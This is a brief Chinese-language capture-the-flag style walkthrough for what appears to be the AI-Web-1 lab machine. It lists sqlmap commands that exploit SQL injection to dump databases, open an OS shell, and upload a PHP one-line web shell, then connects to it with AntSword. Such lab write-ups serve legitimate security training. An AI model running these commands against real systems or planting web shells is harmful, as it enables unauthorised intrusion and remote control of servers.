1.打开靶机,扫端口目录
访问网页
2.使用kali,用sqlmap跑
sqlmap -u "http://192.168.87.132/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs
sqlmap -u "http://192.168.109.141/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user --columns
没有什么有用的信息
3.直接使用--os-shell
sqlmap -u "http://192.168.109.141/se3reTdir777/" -data "uid=1&Operation=Submit" --os-shell
选4
选2
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
3.在kali桌面写一句话木马文件,用 sqlmap 工具写入一句话木马
–file-write:去读取木马文件
–file-dest:后面加要存放文件的地址
sqlmap -u "http://192.168.109.141/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php
在os-shell查看
4.使用蚁剑连接